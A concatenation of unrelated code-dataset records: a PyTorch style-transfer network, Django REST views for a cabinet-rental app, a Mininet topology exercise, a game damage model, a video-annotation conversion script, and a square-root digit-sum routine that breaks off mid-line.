style_dim, n_downsample, 'none', activation, pad_type)\n self.dec = Decoder(self.enc_content.output_dim, input_dim, n_res, n_downsample, 'adain', activation, pad_type)\n self.mlp = MLP(style_dim, mlp_dim, self.calc_adain_params_size(), 3, 'none', 'relu')\n\n def forward(self, x):\n style, content = self.encode(x)\n decoded = self.decode(style, content)\n return decoded\n\n def encode(self, img):\n style = self.enc_style(img)\n content = self.enc_content(img)\n return style, content\n\n def decode(self, style, content):\n adain_params = self.mlp(style)\n self.assign_adain_params_features(adain_params)\n decoded = self.dec(content)\n return decoded\n\n def assign_adain_params_features(self, adain_params):\n for module in self.dec.modules():\n if module.__class__.__name__ == 'AdaptiveInstanceNorm2d':\n module.bias = adain_params[:, :self.mlp_dim]\n module.weight = adain_params[:, self.mlp_dim:self.mlp_dim * 2]\n\n adain_params = adain_params[:, self.mlp_dim * 2:]\n\n def calc_adain_params_size(self):\n count = 0\n for module in self.dec.modules():\n if module.__class__.__name__ == 'AdaptiveInstanceNorm2d':\n count += 2 * module.num_features\n\n return count\n\n\n########################################################################################\n# Encoder\n########################################################################################\nclass ContentEncoder(nn.Module):\n def __init__(self, input_dim, dim, n_downsample, n_res, norm, activation, pad_type):\n super(ContentEncoder, self).__init__()\n\n layers = []\n layers += [Conv2dBlock(input_dim, dim, kernel_size=7, stride=1, padding=3, norm=norm, activation=activation, pad_type=pad_type)]\n for n in range(n_downsample):\n layers += [Conv2dBlock(dim, output_dim=dim * 2, kernel_size=4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)]\n dim *= 2\n\n for n in range(n_res):\n layers += [ResBlock(dim, norm=norm, activation=activation, pad_type=pad_type)]\n\n self.output_dim = dim\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.model(x)\n\n\nclass StyleEncoder(nn.Module):\n def __init__(self, input_dim, dim, style_dim, n_downsample, norm, activation, pad_type):\n super(StyleEncoder, self).__init__()\n\n layers = []\n layers += [Conv2dBlock(input_dim, output_dim=dim, kernel_size=7, stride=1, padding=3, norm=norm, activation=activation, pad_type=pad_type)]\n for n in range(n_downsample):\n layers += [Conv2dBlock(dim, output_dim=dim, kernel_size=4, stride=2, padding=1, 
norm=norm, activation=activation, pad_type=pad_type)]\n\n layers += [nn.AdaptiveAvgPool2d(1)]\n layers += [Conv2dBlock(dim, style_dim, kernel_size=1, stride=1, padding=0, norm=norm, activation='none')]\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n logit = self.model(x)\n return logit.view(logit.size(0), -1)\n\n\n########################################################################################\n# Decoder\n########################################################################################\nclass Decoder(nn.Module):\n def __init__(self, input_dim, output_dim, n_res, n_downsample, norm, activation, pad_type):\n super(Decoder, self).__init__()\n\n layers = []\n for n in range(n_res):\n layers += [ResBlock(input_dim, norm=norm, activation=activation, pad_type=pad_type)]\n\n dim = input_dim\n for n in range(n_downsample):\n layers += [\n nn.Upsample(scale_factor=2),\n Conv2dBlock(dim, dim // 2, kernel_size=5, stride=1, padding=2, norm='ln', activation=activation, pad_type=pad_type)\n ]\n dim //= 2\n\n layers += [Conv2dBlock(dim, output_dim, kernel_size=7, stride=1, padding=3, norm='none', activation='tanh', pad_type=pad_type)]\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.model(x)\n\n\nclass MLP(nn.Module):\n def __init__(self, input_dim, dim, output_dim, n_mlp, norm, activation):\n super(MLP, self).__init__()\n\n layers = []\n layers += [LinearBlock(input_dim, dim, norm, activation)]\n for i in range(n_mlp):\n layers += [LinearBlock(dim, dim, norm, activation)]\n layers += [LinearBlock(dim, output_dim, norm='none', activation='none')]\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.model(x)\n\n","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570670586","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom . 
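The Generator above pushes MLP output into the bias/weight attributes of every AdaptiveInstanceNorm2d in the decoder. The real layer lives in _layers, which is not shown here, so the following is an assumed stand-in that only demonstrates the externally-assigned affine contract (first chunk is bias, second is weight, matching assign_adain_params_features):

import torch
import torch.nn.functional as F

class AdaptiveInstanceNorm2d(torch.nn.Module):
    """Instance norm whose affine parameters are assigned from outside,
    exposing the num_features/weight/bias attributes the Generator pokes."""
    def __init__(self, num_features, eps=1e-5):
        super().__init__()
        self.num_features = num_features
        self.eps = eps
        self.weight = None  # filled in externally before forward()
        self.bias = None

    def forward(self, x):
        assert self.weight is not None and self.bias is not None
        n, c, _, _ = x.shape
        x = F.instance_norm(x, eps=self.eps)  # zero-mean, unit-var per (n, c)
        return x * self.weight.view(n, c, 1, 1) + self.bias.view(n, c, 1, 1)

adain = AdaptiveInstanceNorm2d(4)
feat = torch.randn(2, 4, 8, 8)
params = torch.randn(2, 8)      # style MLP output: 2 * num_features per sample
adain.bias = params[:, :4]      # bias first, as in assign_adain_params_features
adain.weight = params[:, 4:]    # weight second
print(adain(feat).shape)        # torch.Size([2, 4, 8, 8])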
import models, serializers\nfrom rest_framework import status\nfrom space_manager.branches import models as branch_models\nfrom space_manager.users import models as user_models\nfrom space_manager.payment import models as payment_models\nfrom space_manager.payment import serializers as payment_serializers\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom datetime import datetime, timedelta\n\n\nclass CabinetSets(APIView):\n def find_branch(self, branch_id):\n\n try:\n branch = branch_models.Branch.objects.get(id=branch_id)\n return branch\n except branch_models.Branch.DoesNotExist:\n return None\n\n def post(self, request, branch_id, format=None):\n \"\"\" add cabinet set \"\"\"\n\n # add a cabinet set\n # width, height, order, desc\n\n user = request.user\n branch = self.find_branch(branch_id)\n\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n # check that the user is a superuser\n if user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n serializer = serializers.InputCabinetSetSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save(branch=branch)\n\n return Response(\n data=serializer.data, status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, branch_id, format=None):\n \"\"\" get cabinet set \"\"\"\n # fetch the cabinet sets of this branch\n # branch, width, height, order, desc as an array\n branch = self.find_branch(branch_id)\n\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n cabinet_sets = models.CabinetSet.objects.filter(branch=branch)\n print(cabinet_sets)\n\n serializer = serializers.CabinetSetSerializer(cabinet_sets, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n\nclass CabinetSet(APIView):\n def find_cabinet_set(self, cabinet_set_id):\n\n try:\n cabinet_set = models.CabinetSet.objects.get(id=cabinet_set_id)\n return cabinet_set\n except models.CabinetSet.DoesNotExist:\n return None\n\n def check_pre_cabinet(self, cabinet_number):\n\n return models.Cabinet.objects.filter(\n cabinet_number=cabinet_number).exists()\n\n def get(self, request, cabinet_set_id, format=None):\n # fetch a single cabinet set\n # branch, width, height, order, desc, cabinets\n\n cabinet_set = self.find_cabinet_set(cabinet_set_id)\n\n if cabinet_set is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.CabinetSetSerializer(cabinet_set)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n def put(self, request, cabinet_set_id, format=None):\n # update a single cabinet set\n # branch, width, height, order, desc\n\n user = request.user\n if user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n cabinet_set = self.find_cabinet_set(cabinet_set_id)\n\n if cabinet_set is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.CabinetSetSerializer(\n cabinet_set, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def post(self, request, cabinet_set_id, format=None):\n # add a cabinet to the set\n # cabinet_number xpos ypos\n user = request.user\n\n if user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n cabinet_set = self.find_cabinet_set(cabinet_set_id)\n\n if cabinet_set is None:\n return 
Response(status=status.HTTP_404_NOT_FOUND)\n\n # check whether this cabinet number already exists (duplicate check)\n cabinet_number = request.data['cabinet_number']\n\n if self.check_pre_cabinet(cabinet_number) is True:\n return Response(status=status.HTTP_409_CONFLICT)\n\n serializer = serializers.InputCabinetSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save(cabinet_set=cabinet_set)\n return Response(\n data=serializer.data, status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass Cabinet(APIView):\n def find_cabinet(self, cabinet_id):\n try:\n cabinet = models.Cabinet.objects.get(id=cabinet_id)\n return cabinet\n except models.Cabinet.DoesNotExist:\n return None\n\n def get(self, request, cabinet_id, format=None):\n \"\"\" get cabinet \"\"\"\n # fetch a single cabinet\n # cabinet_number cabinet_set xpos ypos\n\n cabinet = self.find_cabinet(cabinet_id)\n if cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.InputCabinetSerializer(cabinet)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n def put(self, request, cabinet_id, format=None):\n # update a single cabinet\n # cabinet_number cabinet_set xpos ypos\n\n cabinet = self.find_cabinet(cabinet_id)\n if cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.InputCabinetSerializer(\n cabinet, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, cabinet_id, format=None):\n # delete a single cabinet\n cabinet = self.find_cabinet(cabinet_id)\n if cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n cabinet.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass Allocate(APIView):\n def payment_checkout(self, payment):\n\n payment_serializer = payment_serializers.InputPaymentSerializer(\n payment, data={'is_usable': False}, partial=True)\n\n if payment_serializer.is_valid():\n payment_serializer.save()\n return True\n\n else:\n return False\n\n def check_overlap(self, usable_usecabinets, start_date, end_date):\n # check for overlapping rental dates\n for usecabinet in usable_usecabinets:\n if usecabinet.end_date >= start_date and usecabinet.start_date <= end_date:\n return False\n return True\n\n def post(self, request, cabinet_id, user_id, format=None):\n # register a cabinet rental\n # start_date, days\n # payment_id when called by a regular user\n creator = request.user\n user = user_models.User.objects.get(id=user_id)\n action = models.CabinetAction.objects.get(substance='regist')\n payment = None\n\n try:\n days = int(request.data['days'])\n start_date = datetime.strptime(request.data['start_date'],\n '%Y-%m-%d %H:%M:%S')\n end_date = start_date + timedelta(days=days)\n\n cabinet = models.Cabinet.objects.get(id=cabinet_id)\n\n except MultiValueDictKeyError:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n except models.Cabinet.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if creator.is_superuser is False:\n if creator != user:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n try:\n payment_id = 
int(request.data['payment'])\n except MultiValueDictKeyError:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n try:\n payment = payment_models.PaymentHistory.objects.get(\n id=payment_id)\n\n except payment_models.PaymentHistory.DoesNotExist:\n payment = None\n\n if payment is None or payment.cost_type.days != days:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n if self.payment_checkout(payment) is False:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n now = datetime.today()\n usable_usecabinets = models.UseCabinet.objects.filter(\n end_date__gte=now, is_usable=True, user=user, is_clean=False)\n\n if self.check_overlap(usable_usecabinets, start_date,\n end_date) is False:\n return Response(status=status.HTTP_403_FORBIDDEN)\n\n new_enroll = models.UseCabinet.objects.create(\n cabinet=cabinet,\n payment=payment,\n user=user,\n start_date=start_date,\n end_date=end_date)\n\n new_history = models.CabinetHistory.objects.create(\n cabinet=cabinet,\n user=user,\n start_date=start_date,\n end_date=end_date,\n cabinet_action=action)\n\n payment_check = True if payment is None else self.payment_checkout(payment)\n\n if payment_check is False:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n new_enroll.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\n\nclass CabinetMembership(APIView):\n def find_use_cabinet(self, usecab_id):\n try:\n use_cabinet = models.UseCabinet.objects.get(id=usecab_id)\n return use_cabinet\n except models.UseCabinet.DoesNotExist:\n return None\n\n def put(self, request, usecab_id, format=None):\n # update a cabinet registration\n # 'cabinet', 'payment', 'user', 'start_date', 'end_date', 'is_usable', 'is_clean',\n\n action = models.CabinetAction.objects.get(substance='modify')\n\n if request.user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n use_cabinet = self.find_use_cabinet(usecab_id)\n if use_cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n user = use_cabinet.user\n cabinet = use_cabinet.cabinet\n start_date = use_cabinet.start_date\n end_date = use_cabinet.end_date\n\n serializer = serializers.UsecabSerializer(\n use_cabinet, data=request.data, partial=True)\n\n if serializer.is_valid():\n\n new_history = models.CabinetHistory.objects.create(\n cabinet=cabinet,\n user=user,\n start_date=start_date,\n end_date=end_date,\n cabinet_action=action)\n\n serializer.save()\n new_history.save()\n\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, usecab_id, format=None):\n # delete a cabinet registration\n\n if request.user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n use_cabinet = self.find_use_cabinet(usecab_id)\n if use_cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n user = use_cabinet.user\n cabinet = use_cabinet.cabinet\n start_date = use_cabinet.start_date\n end_date = use_cabinet.end_date\n action = models.CabinetAction.objects.get(substance='expire')\n\n new_history = models.CabinetHistory.objects.create(\n cabinet=cabinet,\n user=user,\n start_date=start_date,\n end_date=end_date,\n cabinet_action=action)\n\n use_cabinet.delete()\n new_history.save()\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CabinetLock(APIView):\n def find_branch(self, branch_id):\n try:\n branch = branch_models.Branch.objects.get(id=branch_id)\n return branch\n except branch_models.Branch.DoesNotExist:\n return None\n\n def post(self, request, 
branch_id, format=None):\n\n branch = self.find_branch(branch_id)\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.InputCabLockSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(branch=branch)\n return Response(status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, branch_id, format=None):\n branch = self.find_branch(branch_id)\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n cablocks = models.CabinetLock.objects.filter(branch=branch)\n\n serializer = serializers.CabLockSerializer(cablocks, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n\nclass CabinetLockDetail(APIView):\n def put(self, request, cablock_id, format=None):\n\n try:\n lock = models.CabinetLock.objects.get(id=cablock_id)\n except models.CabinetLock.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.CabLockSerializer(\n lock, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"space_manager/cabinets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"541153763","text":"#!/usr/bin/python\n\n# Henry Nguyen\n# hnguye87\n# skeleton code provided by teacher, edited the class final_topo(Topo)\n\nfrom mininet.topo import Topo\nfrom mininet.net import Mininet\nfrom mininet.util import dumpNodeConnections\nfrom mininet.log import setLogLevel\nfrom mininet.cli import CLI\nfrom mininet.node import RemoteController\n\nclass final_topo(Topo):\n def build(self):\n \n # Examples!\n # Create a host with a default route of the ethernet interface. You'll need to set the\n # default gateway like this for every host you make on this assignment to make sure all \n # packets are sent out that port. Make sure to change the h# in the defaultRoute area\n # and the MAC address when you add more hosts!\n h1 = self.addHost('h10',mac='00:00:00:00:00:01',ip='10.0.1.10', defaultRoute=\"h10-eth0\")\n h2 = self.addHost('h20',mac='00:00:00:00:00:02',ip='10.0.2.20', defaultRoute=\"h20-eth0\")\n h3 = self.addHost('h30',mac='00:00:00:00:00:03',ip='10.0.3.30', defaultRoute=\"h30-eth0\")\n h4 = self.addHost('h40',mac='00:00:00:00:00:04',ip='10.0.4.40', defaultRoute=\"h40-eth0\")\n h5 = self.addHost('h50',mac='00:00:00:00:00:05',ip='10.0.5.50', defaultRoute=\"h50-eth0\")\n h6 = self.addHost('h60',mac='00:00:00:00:00:06',ip='10.0.6.60', defaultRoute=\"h60-eth0\")\n h7 = self.addHost('h70',mac='00:00:00:00:00:07',ip='10.0.7.70', defaultRoute=\"h70-eth0\")\n h8 = self.addHost('h80',mac='00:00:00:00:00:08',ip='10.0.8.80', defaultRoute=\"h80-eth0\")\n h9 = self.addHost('server',mac='00:00:00:00:00:09',ip='10.0.9.10', defaultRoute=\"server-eth0\")\n h10 = self.addHost('untrusted',mac='00:00:00:00:00:10',ip='172.16.10.100/24', defaultRoute=\"untrusted-eth0\")\n\n # Create a switch. 
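Allocate.check_overlap above rejects a new booking when any existing one satisfies end >= new_start and start <= new_end, which is the standard closed-interval intersection test. A self-contained check (hypothetical helper, not from the source) makes the boundary behavior explicit:

from datetime import datetime

def intervals_overlap(start_a, end_a, start_b, end_b):
    # Two closed intervals intersect iff each one starts before the other ends.
    return end_a >= start_b and start_a <= end_b

a = (datetime(2020, 1, 1), datetime(2020, 1, 10))
b = (datetime(2020, 1, 10), datetime(2020, 1, 20))   # touches the end of a
c = (datetime(2020, 2, 1), datetime(2020, 2, 5))

print(intervals_overlap(*a, *b))  # True: a shared boundary day counts as overlap
print(intervals_overlap(*a, *c))  # False: disjoint ranges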
No changes here from Lab 1.\n # must use convention switch names s#\n s1 = self.addSwitch('s1') #floor 1 switch 1\n s2 = self.addSwitch('s2') #floor 1 switch 2\n s3 = self.addSwitch('s3') #floor 2 switch 1\n s4 = self.addSwitch('s4') #floor 2 switch 2\n s5 = self.addSwitch('s5') #data center switch \n s6 = self.addSwitch('s6') #core\n \n # Connect Port 8 on the Switch to Port 0 on Host 1 and Port 9 on the Switch to Port 0 on \n # Host 2. This is representing the physical port on the switch or host that you are \n # connecting to.\n \n #links h1,h2,s1 to core\n self.addLink(h1,s1,port1=0, port2=1)\n self.addLink(h2,s1,port1=0, port2=2)\n self.addLink(s6,s1,port1=1, port2=3)\n #links h3,h4,s2 to core \n self.addLink(h3,s2,port1=0, port2=1)\n self.addLink(h4,s2,port1=0, port2=2)\n self.addLink(s6,s2,port1=2, port2=3)\n #links h5,h6,s3 to core\n self.addLink(h5,s3,port1=0, port2=1)\n self.addLink(h6,s3,port1=0, port2=2)\n self.addLink(s6,s3,port1=3, port2=3)\n #links h7,h8,s4 to core\n self.addLink(h7,s4,port1=0, port2=1)\n self.addLink(h8,s4,port1=0, port2=2)\n self.addLink(s6,s4,port1=4, port2=3)\n #links server->data center-> core\n self.addLink(h9,s5,port1=0, port2=1)\n self.addLink(s6,s5,port1=6, port2=3)\n #links untrusted-> core\n self.addLink(h10,s6,port1=0, port2=5)\n print('Topology made')\n\ndef configure():\n topo = final_topo()\n #net = Mininet(topo=topo)\n net = Mininet(topo=topo, controller=RemoteController)\n net.start()\n\n CLI(net)\n \n net.stop()\n\n\nif __name__ == '__main__':\n configure()\n","sub_path":"final_skel.py","file_name":"final_skel.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"285398474","text":"class DamageDistributionModel():\n '''\n Empty structure base class for damage distribution\n '''\n def apply_damage(self, fleet, attack_list):\n '''\n Choose which ships in fleet to attack with list of attacks\n attack_list is tuple (adjusted roll value, damage value)\n '''\n return NotImplemented\n\n def calculate_threat(self, ship):\n '''\n Calculates the threat of a given ship\n '''\n return NotImplemented\n \nclass DefaultDamageDistributionModel(DamageDistributionModel):\n '''\n Default model to choose how to apply damage to a fleet\n\n fleet.shiplist is a list of all ships in fleet\n attack_list is an array of tuples (roll, aim, damage) sorted by highest damage first\n '''\n def apply_damage(self, fleet, attack_list):\n # Sort ships by threat level, then by hull\n ships = []\n for ship in fleet.shiplist:\n ships.append((ship, self.calculate_threat(ship), ship.get_hp()))\n\n ships.sort(key=lambda ship:ship[2], reverse=True)\n ships.sort(key=lambda ship:ship[1], reverse=True)\n\n # Run attacks\n for atk in attack_list:\n used = False # boolean if attack has been used\n if atk[0] == 1:\n continue # ignore 1 rolls\n\n # Check if can one shot\n for ship in ships:\n if not ship[0].is_alive() or ship[1] == 0:\n continue # Skip dead ships and skip ships with no threat\n\n # Check if roll can hit ship\n if atk[0] == 6 or atk[0] + atk[1] - ship[0].get_shield() >= 6:\n # Check if can one shot\n if ship[0].get_hp() <= atk[2]:\n # Damage ship\n ship[0].take_damage(atk[2])\n used = True\n break # break out of ship for loop and move to next attack if it exists\n\n # Hit first ship can hit\n if not used:\n for ship in ships:\n if not ship[0].is_alive():\n continue # skip dead ships\n # Check if roll can hit ship\n if atk[0] == 6 or atk[0] + atk[1] - ship[0].get_shield() >= 6:\n 
# Damage ship\n ship[0].take_damage(atk[2])\n used = True\n break # break out of ship for loop and move to next attack if it exists\n\n def calculate_threat(self, ship):\n '''\n Default threat level is calculated damage per turn\n '''\n aim = 1\n damage = 0\n for part in ship.parts:\n aim += part.aim\n damage += part.weapon_damage\n\n if aim > 5:\n aim = 5\n\n return damage * (aim / 6.0) # aim / 6.0 should be estimated hit chance\n\nif __name__ == '__main__':\n import ships\n ship = ships.CreateShip(\"Cruiser\", \"hull,blank,ion_cannon,nuclear_source,electron_computer,nuclear_drive\")\n model = DefaultDamageDistributionModel()\n print(model.calculate_threat(ship))","sub_path":"src/damage_models.py","file_name":"damage_models.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"462061661","text":"import os\nimport shutil\nimport argparse\nimport logging\nfrom flip_utils import flip_samples\n\nto_id = 0\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--annotated-base-path\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/annotated/0426\")\n parser.add_argument(\"--category-file-path\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/label/category.txt\")\n\n # from labels & from frames\n parser.add_argument(\"--from-labels-file-path\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/annotated/0426/from_label.txt\")\n parser.add_argument(\"--from-frames-dir\", type=str,\n default=\"/ssd4/zhangyiyang/tomcat9/webapps/annotation-tool/input/video\")\n parser.add_argument(\"--from-img-format\", type=str, default=\"{:05d}.jpg\")\n parser.add_argument(\"--from-time-interval\", type=float, default=.1)\n\n # to frames\n parser.add_argument(\"--to-frames-dir-name\", type=str, default=\"frames\")\n parser.add_argument(\"--to-labels-file-name\",\n type=str, default=\"to_label.txt\")\n parser.add_argument(\"--to-labels-file-append\", action=\"store_true\")\n parser.add_argument(\"--global-to-labels-dir\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/label/summary\")\n parser.add_argument(\"--to-img-format\", type=str, default=\"{:05d}.jpg\")\n parser.add_argument(\"--to-time-interval\", type=float, default=.1)\n\n # flip\n parser.add_argument(\"--flip\", action=\"store_true\")\n parser.add_argument(\"--flip-frames-dir-name\", type=str,\n default=\"flip_frames\")\n parser.add_argument(\"--flip-to-labels-file-name\",\n type=str, default=\"flip_to_label.txt\")\n\n return parser.parse_args()\n\n\ndef _handle_one_file(from_label_file_path, to_file, category_to_id,\n from_time_interval, from_frames_dir, from_img_format,\n to_time_interval, to_frames_dir, to_img_format,):\n # check that the annotation file exists\n logging.info(\"start processing {}\".format(from_label_file_path))\n if not os.path.exists(from_label_file_path):\n logging.warning(\"{} doesn't exist\".format(from_label_file_path))\n return\n\n # the output sample id is kept as a global variable\n global to_id\n\n # ratio between the target and the original sampling intervals\n inner_interval = int(\n round(to_time_interval / from_time_interval, 0))\n\n # target sampling interval, in tenths of a second\n to_time_interval = int(round(to_time_interval * 10, 0))\n\n # read the annotation file and drop the header line\n with open(from_label_file_path, \"r\") as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n lines.pop(0)\n\n # each remaining line describes one TSM sample\n for idx, line in enumerate(lines):\n # parse the line\n splits = line.split(\",\")\n from_id = splits[0]\n t1 = int(round(float(splits[4]) * 10, 0))\n t2 = int(round(float(splits[5]) * 10, 0))\n label = splits[3]\n\n # compute the frame indices in the original video\n 
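calculate_threat above scores a ship as total weapon damage scaled by an estimated d6 hit chance, with a base aim of 1 and a cap at 5. The same arithmetic in isolation (an illustrative helper, not part of the module):

def expected_damage_per_turn(part_aims, part_damages):
    """Mirror of the default threat heuristic: total damage times estimated hit chance."""
    aim = min(1 + sum(part_aims), 5)        # base aim of 1, capped at 5
    return sum(part_damages) * (aim / 6.0)  # aim/6 approximates P(hit) on a d6

# A ship with one +1 aim computer and two 2-damage cannons:
print(expected_damage_per_turn([1, 0, 0], [0, 2, 2]))  # 4 * (2/6) = 1.333...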
from_ids = [(t1 + i * to_time_interval) * inner_interval\n for i in range(100)\n if (t1 + i * to_time_interval) * inner_interval <= t2]\n\n # prepare source and destination frame directories\n from_frame_path = os.path.join(from_frames_dir, from_id)\n to_frame_path = os.path.join(to_frames_dir, str(to_id))\n to_id += 1\n if not os.path.exists(from_frame_path):\n print(\"from frame path {} doesn't exist\".format(from_frame_path))\n continue\n if not os.path.exists(to_frame_path):\n os.makedirs(to_frame_path)\n\n # copy the images and renumber them\n for to_idx, from_idx in enumerate(from_ids):\n # computed indices start at 0, but extracted frame images are numbered from 1\n from_img = os.path.join(\n from_frame_path,\n str(from_img_format).format(from_idx+1))\n to_img = os.path.join(\n to_frame_path, str(to_img_format).format(to_idx+1))\n if os.path.exists(from_img):\n shutil.copyfile(from_img, to_img)\n else:\n print(\"error copy {} to {}\".format(from_img, to_img))\n\n # append a line to the output label file\n label_id = category_to_id[label]\n frame_cnt = len(from_ids)\n to_file.write(to_frame_path + \" \" + str(frame_cnt) +\n \" \" + str(label_id) + \"\\n\")\n\n\ndef _get_start_id(cur_dir):\n max_id = 0\n for file_name in os.listdir(cur_dir):\n try:\n idx = int(file_name)\n max_id = max(idx, max_id)\n except ValueError:\n pass\n return max_id + 1\n\n\ndef main(args):\n assert args.from_time_interval <= args.to_time_interval\n assert os.path.exists(args.annotated_base_path)\n\n to_frames_dir = os.path.join(\n args.annotated_base_path,\n args.to_frames_dir_name,\n )\n if not os.path.exists(to_frames_dir):\n os.makedirs(to_frames_dir)\n\n global to_id\n to_id = _get_start_id(to_frames_dir)\n\n # 1. build the label-to-id dictionary\n with open(args.category_file_path, \"r\") as f:\n categories = f.readlines()\n categories = [c.replace(\"\\n\", \"\") for c in categories]\n category_to_id = {c: idx for idx, c in enumerate(categories)}\n\n # 2. open the output label file\n to_labels_file_path = os.path.join(\n args.annotated_base_path,\n args.to_labels_file_name,\n )\n if args.to_labels_file_append:\n to_file = open(to_labels_file_path, \"a\")\n else:\n to_file = open(to_labels_file_path, \"w\")\n\n # 3. convert the from-labels into to-labels\n _handle_one_file(args.from_labels_file_path, to_file, category_to_id,\n args.from_time_interval,\n args.from_frames_dir,\n args.from_img_format,\n args.to_time_interval,\n to_frames_dir,\n args.to_img_format)\n to_file.close()\n\n # 4. flip\n flip_to_frames_dir = os.path.join(\n args.annotated_base_path,\n args.flip_frames_dir_name,\n )\n if not os.path.exists(flip_to_frames_dir):\n os.makedirs(flip_to_frames_dir)\n if args.flip:\n flip_samples(\n to_labels_file_path,\n os.path.join(args.annotated_base_path,\n args.flip_to_labels_file_name),\n flip_to_frames_dir\n )\n\n # 5. copy the label files into the global-to-labels dir
\n shutil.copy(to_labels_file_path,\n os.path.join(args.global_to_labels_dir,\n os.path.basename(args.annotated_base_path)\n + \"_annotated_to_labels.txt\"))\n if args.flip:\n shutil.copy(os.path.join(args.annotated_base_path,\n args.flip_to_labels_file_name),\n os.path.join(args.global_to_labels_dir,\n os.path.basename(args.annotated_base_path)\n + \"_annotated_flip_to_labels.txt\"))\n\n\nif __name__ == '__main__':\n main(_parse_args())\n","sub_path":"src/annotated_labels_to_labels.py","file_name":"annotated_labels_to_labels.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"538494962","text":"import timeit\nimport decimal\n\n\ndef solution():\n sqrts = get_irrational_square_roots()\n return sum([get_digital_sum(sqrt) for sqrt in sqrts])\n\n\ndef get_irrational_square_roots():\n sqrts = []\n for i in range(0,100):\n decimal.getcontext().prec = 102\n sqrt = decimal.Decimal(i).sqrt()\n if sqrt % 1:\n sqrts.append(sqrt)\n return sqrts\n\n\ndef get_digital_sum(sqrt):\n sqrt = str(sqrt).replace('.', '')[:100]\n lenS = len(sqrt)\n total = 0\n for i 